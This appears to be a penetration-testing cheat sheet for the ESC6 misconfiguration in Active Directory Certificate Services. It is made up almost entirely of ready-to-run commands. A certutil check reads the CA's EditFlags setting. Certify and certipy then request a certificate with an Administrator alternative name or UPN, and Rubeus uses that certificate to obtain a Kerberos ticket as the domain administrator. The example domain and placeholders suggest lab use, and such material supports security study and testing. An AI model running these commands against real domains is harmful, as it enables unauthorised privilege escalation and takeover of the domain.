ESC6
ESC6 permits the inclusion of user-defined values in subject alternative name
for any request.
Verify the permission:
PS /home/bobbuilder> certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"
Windows
Request a certificate abusing ESC6
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:Administrator
Convert certificate to PFX
Get a TGT as the Administrator Account
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx
Linux
Certificate Request with an alternative UPN
bob$ certipy req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template <template_name> -upn administrator@minions.com